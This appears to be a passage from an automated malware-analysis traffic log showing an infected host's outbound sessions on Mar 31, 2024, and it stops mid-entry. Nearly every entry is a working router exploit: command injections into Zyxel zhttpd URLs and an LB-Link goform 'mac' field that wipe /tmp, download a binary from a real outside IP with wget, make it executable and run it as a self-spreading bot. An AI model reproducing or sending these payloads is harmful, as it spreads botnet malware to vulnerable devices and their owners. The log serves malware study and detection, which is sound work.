                              Mar 31, 2024 08:42:13.443546057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8932192.168.2.1359364193.67.211.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443597078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8933192.168.2.1359172139.201.189.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443646908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8934192.168.2.1346494167.139.119.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443682909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8935192.168.2.1337116155.156.181.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443705082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8936192.168.2.1342820184.70.139.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443737984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8937192.168.2.134164438.243.93.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443770885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8938192.168.2.136038219.116.8.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443808079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8939192.168.2.135115450.136.100.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443849087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8940192.168.2.1343298212.3.116.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443876982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8941192.168.2.1340022201.40.105.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443928003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8942192.168.2.1342666113.240.95.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443958998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8943192.168.2.1345946135.163.96.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444061041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8944192.168.2.135755817.188.251.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444101095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8945192.168.2.134929286.184.57.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444119930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8946192.168.2.1343526223.251.25.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444156885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8947192.168.2.1359372169.243.208.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444242954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8948192.168.2.1344166192.200.53.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444281101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8949192.168.2.1340136223.183.30.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444323063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8950192.168.2.1352732114.72.2.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444379091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8951192.168.2.1340100187.59.125.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444397926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8952192.168.2.1353908222.104.244.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444433928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8953192.168.2.1341364126.129.155.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444468021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8954192.168.2.1339902142.187.248.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444519997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8955192.168.2.1355982160.90.126.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.444550037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8956192.168.2.134803667.175.61.268080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.368941069 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8957192.168.2.1352528174.85.58.858080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.398159981 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8958192.168.2.1334266178.151.218.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451200962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8959192.168.2.1337432221.217.21.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451235056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8960192.168.2.1354402140.204.206.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451251984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8961192.168.2.1352788159.135.69.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451318979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8962192.168.2.1347768167.71.206.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451354980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8963192.168.2.1344060198.160.208.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451383114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8964192.168.2.1341024120.50.128.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451421022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8965192.168.2.1345252149.77.32.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451478004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8966192.168.2.1347518197.68.252.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451505899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8967192.168.2.1352394121.121.224.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451533079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8968192.168.2.1358930169.87.251.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451566935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8969192.168.2.1335892221.61.133.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451627016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8970192.168.2.1360950182.136.84.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451670885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8971192.168.2.134654636.82.16.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451694012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8972192.168.2.1339932149.225.69.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451728106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8973192.168.2.1344030145.18.46.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451776028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8974192.168.2.1338642169.172.64.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451821089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8975192.168.2.135378077.11.179.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451838017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8976192.168.2.1340822121.229.4.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451899052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8977192.168.2.1347706160.96.47.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451937914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8978192.168.2.1335998159.46.129.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.451963902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8979192.168.2.135044454.196.149.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452009916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8980192.168.2.1354058204.65.145.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452027082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8981192.168.2.133906847.172.149.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452075958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8982192.168.2.135376876.54.221.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452115059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8983192.168.2.1339434166.203.223.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452146053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8984192.168.2.135279017.42.69.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452202082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8985192.168.2.135386691.145.115.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452270031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8986192.168.2.1358974172.62.173.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452295065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8987192.168.2.1353318212.87.48.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:14.452346087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8988192.168.2.134198243.128.237.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457139015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8989192.168.2.1350444172.135.129.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457200050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8990192.168.2.135601896.223.69.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457256079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8991192.168.2.1334498118.23.231.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457303047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8992192.168.2.134202858.147.89.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457412958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8993192.168.2.1340470211.169.228.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:15.457451105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8994192.168.2.1348414186.215.52.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.468849897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8995192.168.2.1360014189.192.224.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.468908072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8996192.168.2.133443424.107.233.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.468972921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8997192.168.2.1353604168.128.209.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469043970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8998192.168.2.135339488.85.159.103443
